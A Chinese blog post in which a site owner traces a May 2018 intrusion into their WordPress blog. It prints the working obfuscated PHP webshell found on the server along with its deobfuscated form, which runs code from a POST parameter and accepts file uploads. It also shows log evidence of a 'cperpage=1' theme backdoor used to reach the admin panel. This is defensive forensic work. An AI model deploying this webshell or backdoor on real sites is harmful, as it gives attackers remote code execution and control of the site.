对一次网络攻击的调查(及教训)

2018年5月18日,我偶然发现自己的博客的404页面上出现了一串奇怪的数字。它的一部分被某些HTML元素遮挡了,但我还是通过浏览器的开发者工具得到了它——8194460

接下来我做了一件大错特错的事——在Wordpress中将Wordpress和官方的主题全都更新了,这直接使得很多证据丢失了。


反混淆

我透过SSH连接至主机,发现站点根目录下多了一个名为assets的目录,而下载WordPress本身是不含这个目录的。其中只有一个文件(assets/picture/accesson.php),内容如下:

<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>

其中包含base64_decode()eval(),结合其长度来看,这很可能是个小马(木马释放器)或是不带交互界面的Webshell。

其使用chr()来生成特定的ascii字符,这使得许多unPHP工具无法应对它——这些工具大多只针对base64_decode,gzipeval相关函数。

将其反混淆(deobfuscation)后得如下结果:(其中被注释部分为最终解析结果)

<?php 
echo 7457737+736723;

//$raPo_rZluoE = "base64_decode"
$raPo_rZluoE=base64_decode("YmFzZTY0X2RlY29kZQ==");

//$ydSJPtnwrSv = "copy"
$ydSJPtnwrSv=base64_decode("Y29weQ==");

//eval("base64_decode($_POST['id'])");
eval($raPo_rZluoE($_POST[base64_decode("aWQ=")]));

//if($_POST['up'] == 'up') {
	//@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']);
//}
if($_POST[base64_decode("dXA=")] == base64_decode("dXA=")){
	@$ydSJPtnwrSv($_FILES[base64_decode("ZmlsZQ==")][base64_decode("dG1wX25hbWU=")],$_FILES[base64_decode("ZmlsZQ==")][base64_decode("bmFtZQ==")]);}; 
?>

可见其具有如下功能:

  1. 以POST方式请求,在request中包含id时,将其对应的值经base64解码后作为PHP代码执行
  2. 以POST方式请求,在request中包含up且其对应值为up时,接受上传的文件并拷贝至指定路径。
  3. 第一行的echo 7457737+736723;或是起到标记作用。此外,7457737+736723=8194460

接下来我开始检查wordpress的文件,方法大致是:

  1. 删除所有不使用的主题
  2. 对比官方的zip包以及网站目录下各文件的sha256
  3. 对于插件则进行人工的代码审计。

未发现有其他文件遭篡改。这是因为我删除了一些主题并将现使用的主题更新(覆盖)了。


日志分析

鉴于logrotate将3天以上的日志文件加以压缩,故将该站点所对应日志拷贝至单独文件夹并解压缩

$ cd ~
$ mkdir log_blog
$ cp /var/log2/apache2/hardrain980.com.access.log* ~/log_blog
$ cd ~/log2
$ gunzip ./*.gz

关于accesson.php

$ grep -rnw ./ -Ee '^(GET|POST).*accesson' -B1 -A2

./hardrain980.com.access.log.2-1371-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:08:30:22 +0000] - https 404 38120Bytes
./hardrain980.com.access.log.2:1372:GET /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-1373-REF:-
./hardrain980.com.access.log.2-1374-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/62.0.3202.89 Chrome/62.0.3202.89 Safari/537.36
--
./hardrain980.com.access.log.2-1376-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:08:30:25 +0000] - https 404 38174Bytes
./hardrain980.com.access.log.2:1377:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-1378-REF:http://ya.ru/
./hardrain980.com.access.log.2-1379-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/62.0.3202.89 Chrome/62.0.3202.89 Safari/537.36
--
./hardrain980.com.access.log.2-1381-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:08:30:28 +0000] - https 404 4511Bytes
./hardrain980.com.access.log.2:1382:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-1383-REF:http://ya.ru/
./hardrain980.com.access.log.2-1384-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/62.0.3202.89 Chrome/62.0.3202.89 Safari/537.36
--
./hardrain980.com.access.log.2-1386-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:08:30:29 +0000] - https 404 38174Bytes
./hardrain980.com.access.log.2:1387:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-1388-REF:http://ya.ru/
./hardrain980.com.access.log.2-1389-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/62.0.3202.89 Chrome/62.0.3202.89 Safari/537.36
--
./hardrain980.com.access.log.2-1391-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:08:30:31 +0000] - https 404 38261Bytes
./hardrain980.com.access.log.2:1392:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-1393-REF:http://ya.ru/
./hardrain980.com.access.log.2-1394-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/62.0.3202.89 Chrome/62.0.3202.89 Safari/537.36
--
./hardrain980.com.access.log.2-1396-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:08:30:32 +0000] - https 404 38895Bytes
./hardrain980.com.access.log.2:1397:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-1398-REF:http://ya.ru/
./hardrain980.com.access.log.2-1399-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/62.0.3202.89 Chrome/62.0.3202.89 Safari/537.36
--
./hardrain980.com.access.log.2-1401-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:08:30:34 +0000] - https 404 35709Bytes
./hardrain980.com.access.log.2:1402:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-1403-REF:http://ya.ru/
./hardrain980.com.access.log.2-1404-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/62.0.3202.89 Chrome/62.0.3202.89 Safari/537.36
--
./hardrain980.com.access.log.2-5766-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:21:17:11 +0000] - http 301 636Bytes
./hardrain980.com.access.log.2:5767:GET /assets/images/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-5768-REF:-
./hardrain980.com.access.log.2-5769-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/60.0.3112.78 Chrome/60.0.3112.78 Safari/537.36
--
./hardrain980.com.access.log.2-5771-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:21:17:15 +0000] - https 200 3825Bytes
./hardrain980.com.access.log.2:5772:GET /assets/images/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-5773-REF:-
./hardrain980.com.access.log.2-5774-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/60.0.3112.78 Chrome/60.0.3112.78 Safari/537.36
--
./hardrain980.com.access.log.4-2286-77.111.150.118(-,HU) [15/May/2018:11:10:44 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4:2287:GET /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2288-REF:https://hardrain980.com/wp-content/themes/twentysixteen/404.php
./hardrain980.com.access.log.4-2289-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4-2291-77.111.150.118(-,HU) [15/May/2018:11:10:46 +0000] - https 404 43232Bytes
./hardrain980.com.access.log.4:2292:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2293-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2294-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4-2296-77.111.150.118(-,HU) [15/May/2018:11:10:54 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4:2297:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2298-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2299-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4-2301-77.111.150.118(-,HU) [15/May/2018:11:10:58 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4:2302:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2303-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2304-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4-2306-77.111.150.118(-,HU) [15/May/2018:11:11:02 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4:2307:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2308-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2309-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4-2311-77.111.150.118(-,HU) [15/May/2018:11:11:06 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4:2312:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2313-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2314-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36

可见都是只有两个IP有曾访问过这个文件(77.111.150.118|77.111.175.75)

于是我又用同样方法(grep -rnw ./ -Ee '^(77\.111\.150\.118|77\.111\.175\.75)' -A3),检索这两个IP

关于77.111.150.118和77.111.175.75

$ grep -rnw ./ -Ee '^(77\.111\.150\.118|77\.111\.175\.75)' -A3

./hardrain980.com.access.log.6:831:77.111.175.75(Zalaegerszeg,HU) [13/May/2018:08:38:44 +0000] - http 301 734Bytes
./hardrain980.com.access.log.6-832-GET /wp-content/plugins/woocommerce-catalog-enquiry/assets/frontend/js/chosen.js HTTP/1.1
./hardrain980.com.access.log.6-833-REF:-
./hardrain980.com.access.log.6-834-UA:Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2912.16 Safari/537.36
--
./hardrain980.com.access.log.6:836:77.111.175.75(Zalaegerszeg,HU) [13/May/2018:08:38:48 +0000] - http 301 734Bytes
./hardrain980.com.access.log.6-837-GET /wp-content/plugins/woocommerce-catalog-enquiry/assets/frontend/js/chosen.js HTTP/1.1
./hardrain980.com.access.log.6-838-REF:-
./hardrain980.com.access.log.6-839-UA:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; Win64; x64; Trident/5.0)

由此发现,77.111.175.75最早是在5月13日开始扫描漏洞——它访问了一个插件所对应的路径,而这个插件在我的WordPress上并不存在。

关于cperpage=1

而77.111.150.118的另一个举动引起了我的注意——他们不断地尝试在首页加上cperpage=1的query parameter进行访问,这是个很反常的现象:

./hardrain980.com.access.log.4:2221:77.111.150.118(-,HU) [15/May/2018:11:10:22 +0000] - https 301 1367Bytes
./hardrain980.com.access.log.4-2222-GET /index.php?cperpage=1 HTTP/1.1
./hardrain980.com.access.log.4-2223-REF:https://hardrain980.com/
./hardrain980.com.access.log.4-2224-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2226:77.111.150.118(-,HU) [15/May/2018:11:10:24 +0000] - https 200 20331Bytes
./hardrain980.com.access.log.4-2227-GET /?cperpage=1 HTTP/1.1
./hardrain980.com.access.log.4-2228-REF:https://hardrain980.com/
./hardrain980.com.access.log.4-2229-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2231:77.111.150.118(-,HU) [15/May/2018:11:10:25 +0000] - https 301 597Bytes
./hardrain980.com.access.log.4-2232-GET /index.php?cperpage=1 HTTP/1.1
./hardrain980.com.access.log.4-2233-REF:https://hardrain980.com/?cperpage=1
./hardrain980.com.access.log.4-2234-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2236:77.111.150.118(-,HU) [15/May/2018:11:10:26 +0000] - https 200 20333Bytes
./hardrain980.com.access.log.4-2237-GET /?cperpage=1 HTTP/1.1
./hardrain980.com.access.log.4-2238-REF:https://hardrain980.com/?cperpage=1
./hardrain980.com.access.log.4-2239-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2241:77.111.150.118(-,HU) [15/May/2018:11:10:34 +0000] - https 301 768Bytes
./hardrain980.com.access.log.4-2242-GET /index.php?cperpage=1 HTTP/1.1
./hardrain980.com.access.log.4-2243-REF:https://hardrain980.com/?cperpage=1
./hardrain980.com.access.log.4-2244-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2246:77.111.150.118(-,HU) [15/May/2018:11:10:35 +0000] - https 200 20334Bytes
./hardrain980.com.access.log.4-2247-GET /?cperpage=1 HTTP/1.1
./hardrain980.com.access.log.4-2248-REF:https://hardrain980.com/?cperpage=1
./hardrain980.com.access.log.4-2249-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36

随后它竟然进入了后台,并且由它的行为来看,进入后台后它编辑了我当前所使用的主题的404.php,并在主题根目录下释放了另一个accesson.php这便可以解释404页面出现奇怪数字的情形

./hardrain980.com.access.log.4:2251:77.111.150.118(-,HU) [15/May/2018:11:10:36 +0000] - https 200 14980Bytes
./hardrain980.com.access.log.4-2252-GET /wp-admin/theme-editor.php?file=404.php HTTP/1.1
./hardrain980.com.access.log.4-2253-REF:https://hardrain980.com/?cperpage=1
./hardrain980.com.access.log.4-2254-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2266:77.111.150.118(-,HU) [15/May/2018:11:10:38 +0000] - https 302 715Bytes
./hardrain980.com.access.log.4-2267-POST /wp-admin/theme-editor.php HTTP/1.1
./hardrain980.com.access.log.4-2268-REF:https://hardrain980.com/wp-admin/theme-editor.php?file=404.php
./hardrain980.com.access.log.4-2269-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2271:77.111.150.118(-,HU) [15/May/2018:11:10:39 +0000] - https 200 14570Bytes
./hardrain980.com.access.log.4-2272-GET /wp-admin/theme-editor.php?a=1&theme=twentysixteen&file=404.php HTTP/1.1
./hardrain980.com.access.log.4-2273-REF:https://hardrain980.com/wp-admin/theme-editor.php?file=404.php
./hardrain980.com.access.log.4-2274-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2276:77.111.150.118(-,HU) [15/May/2018:11:10:40 +0000] - https 500 513Bytes
./hardrain980.com.access.log.4-2277-GET /wp-content/themes/twentysixteen/404.php HTTP/1.1
./hardrain980.com.access.log.4-2278-REF:https://hardrain980.com/wp-admin/theme-editor.php?a=1&theme=twentysixteen&file=404.php
./hardrain980.com.access.log.4-2279-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2281:77.111.150.118(-,HU) [15/May/2018:11:10:42 +0000] - https 500 672Bytes
./hardrain980.com.access.log.4-2282-POST /wp-content/themes/twentysixteen/404.php HTTP/1.1
./hardrain980.com.access.log.4-2283-REF:https://hardrain980.com/wp-content/themes/twentysixteen/404.php
./hardrain980.com.access.log.4-2284-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2286:77.111.150.118(-,HU) [15/May/2018:11:10:44 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4-2287-GET /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2288-REF:https://hardrain980.com/wp-content/themes/twentysixteen/404.php
./hardrain980.com.access.log.4-2289-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2291:77.111.150.118(-,HU) [15/May/2018:11:10:46 +0000] - https 404 43232Bytes
./hardrain980.com.access.log.4-2292-POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2293-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2294-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2296:77.111.150.118(-,HU) [15/May/2018:11:10:54 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4-2297-POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2298-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2299-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2301:77.111.150.118(-,HU) [15/May/2018:11:10:58 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4-2302-POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2303-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2304-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2306:77.111.150.118(-,HU) [15/May/2018:11:11:02 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4-2307-POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2308-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2309-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2311:77.111.150.118(-,HU) [15/May/2018:11:11:06 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4-2312-POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2313-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2314-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36

数据库

随后我在数据库中检索这两个IP和所使用的User-Agent,发现存在用于记住登录的token。为保安全,我将这组字段删除了,但这回使所有记住登录的用户都需要重新登录。


参考资料:

关于accesson.php:

Drupalgeddon2 (SA-CORE-2018-002 / CVE-2018-7600) – an analysis of payloads observed in the wild ——值得注意的是,其文中所被利用的漏洞是Drupal的CVE-2018-7600;此外,我站上的accesson.php与此文中所提到的同文件名样本具有相同MD5值。

Additional Finds in Compromised Site · Issue #12 · scr34m/php-malware-scanner——反映的是使用某插件的WordPress经常被挂上accesson.php这一后门。

关于cperpage=1:

这是一个嵌入主题中的木马,骇客是透过这个后门进入我站的后台,并篡改文件,挂上自己的木马。

Wordpress functions.php 主题文件后门分析
——其中有提及这个后门可被用作未经授权地访问后台,并具有感染性(当存在后门的主题被启用,自动在其他已安装主题中添加此后门)。


总结:

1.教训:发现有被黑迹象应保留证据,这次因对主题进行覆盖更新,导致无法查看主题目录下的accesson.php和被篡改的404.php
2.cperpage=1这一隐藏于主题的后门历史悠久(2010年便曾被报告),且可能存在于我站多时,但一直未被发现,直到这次被骇客加以利用。
3.这次攻击行为似乎未对我站造成某些实质性影响,包括但不限于页面被篡改/用于发送垃圾邮件/用于攻击其他主机/用于加密货币挖矿等。
4.不要在某些主题站下载主题,尤其是某些付费主题的"破解版"——一篇参考文章中的调查指出这个后门可能是在不良主题站二次打包时加入的。
5.(Update:2018.6.1)可考虑通过find $wordpress_path -type f -exec chmod 444 {} +配合将WordPress目录下所有文件的权限由644更改为444,使得除root用户以外的用户无法对其写入。但这种方法将影响插件/主题/WordPress本体的自动更新。